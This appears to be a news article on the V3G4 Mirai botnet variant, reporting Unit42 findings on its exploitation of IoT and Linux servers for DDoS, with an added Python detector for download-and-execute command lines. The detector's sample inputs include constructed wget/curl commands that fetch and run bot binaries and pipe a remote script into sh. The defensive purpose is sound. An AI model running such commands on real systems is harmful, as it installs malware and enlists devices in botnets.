Attackers are using a new variant of the Mirai botnet, known as V3G4, to attack IoT devices and Linux-based servers.
On February 15, 2023, Unit42 security researchers at Palo Alto Networks published a bulletin on a new variant of the Mirai botnet, dubbed “V3G4”. In the post, Unit42 warned readers that various campaigns, tracked between July and December 2022, used the botnet malware to execute exploits.
In total, the attacker managed to exploit 13 security vulnerabilities, each of which could allow remote code execution to create a botnet. Unit42 wrote in its bulletin that when code is executed remotely, “the wget and curl utilities automatically run to download sample Mirai clients from the malicious infrastructure and then run the downloaded bot clients.”
Unit42 also informed readers that the same attacker is behind every attack. Moreover, the attacker used a racist slur in the attack, which was censored in the bulletin. At the time of writing, no malicious service has been associated with this series of attacks.
This new variant of Mirai has been used to hack IoT devices and Linux-based servers. In the aforementioned bulletin, Unit42 wrote that V3G4 “targets Linux-based open servers and network devices” and also targets IoT devices to “carry out further attacks such as distributed denial-of-service (DDoS) attacks.” Unit42 also wrote that “once the client establishes a connection to the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.” Botnets are commonly used in DDoS attacks to disrupt the normal flow of Internet traffic to a server or website. This can cause the server or site to crash, making it temporarily unavailable to regular users.
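The download-and-run step Unit42 describes (wget or curl fetching a bot client that is then executed) leaves a recognizable pattern in process command-line logs. The Python below is an added example for defenders, not code from Unit42 or the original article; the command lines, addresses and file names are constructed, and it assumes one logged command line per string.

```python
import os
import re
from urllib.parse import urlparse

DOWNLOADERS, SHELLS = {"wget", "curl"}, {"sh", "bash", "ash", "dash"}
# Constructed process command lines (not from the Unit42 report); documentation-range IPs.
SAMPLE_CMDLINES = [
    "sh -c cd /tmp; wget http://198.51.100.7/bot.arm7; chmod 777 bot.arm7; ./bot.arm7",
    "sh -c curl -s -o /var/tmp/x86 http://198.51.100.7/x86 && chmod +x /var/tmp/x86 && /var/tmp/x86",
    "sh -c curl http://198.51.100.7/s.sh | sh",
    "curl -fsSL https://example.org/release.tar.gz -o /home/build/release.tar.gz",
]

def downloaded_name(argv):
    """Basename the downloader writes to, or None when it streams to stdout."""
    tool = os.path.basename(argv[0])
    out_flag = "-O" if tool == "wget" else "-o"
    for i, arg in enumerate(argv[1:-1], start=1):
        if arg == out_flag:
            return None if argv[i + 1] == "-" else os.path.basename(argv[i + 1])
    urls = [a for a in argv[1:] if re.match(r"(?i)(https?|ftp)://", a)]
    if not urls or (tool == "curl" and "-O" not in argv):
        return None  # curl without -o/-O prints the body to stdout
    return os.path.basename(urlparse(urls[0]).path) or "index.html"

def find_download_exec(cmdline):
    """Return (tool, file) when a wget/curl download is later executed, else None."""
    parts = re.split(r"(\|\||&&|;|\|)", cmdline)  # commands at even indexes, separators at odd
    pending, prev_tool = {}, None  # pending: downloaded basename -> tool that fetched it
    for i in range(0, len(parts), 2):
        argv = [t.strip("'\"") for t in parts[i].split()]
        if len(argv) > 2 and os.path.basename(argv[0]) in SHELLS and argv[1] == "-c":
            argv = argv[2:]  # unwrap "sh -c <command>"
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        if i and parts[i - 1] == "|" and prev_tool and prog in SHELLS:
            return (prev_tool, "<stdin>")  # download piped straight into a shell
        target = argv[1] if prog in SHELLS and len(argv) > 1 else argv[0]
        name = os.path.basename(target)
        if prog not in DOWNLOADERS and name in pending:
            return (pending[name], name)  # downloaded file run directly or via a shell
        prev_tool = prog if prog in DOWNLOADERS else None
        if prev_tool and (name := downloaded_name(argv)):
            pending[name] = prev_tool
    return None

if __name__ == "__main__":
    print(*((find_download_exec(c), c) for c in SAMPLE_CMDLINES), sep="\n")
```

A download on its own is not flagged; only a download whose output is subsequently run (or piped into a shell) in the same command line is reported, which keeps routine package and artifact fetches out of the results.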
Mirai malware has been a threat for years
Variants of the Mirai botnet have been used repeatedly to launch malicious attacks since the first Mirai program appeared in 2016.
Mirai botnets attacked many well-known platforms, including Minecraft, Amazon, Netflix and PayPal. There is no doubt that this malware family poses a huge risk to online services.
Botnets are dangerous but effective attack vectors
Creating a network of zombie devices to carry out malicious exploits is a sophisticated but highly dangerous technique used by cybercriminals today, especially in DDoS attacks. We will certainly see more types of botnet malware appear in the future, perhaps from the creators of Mirai.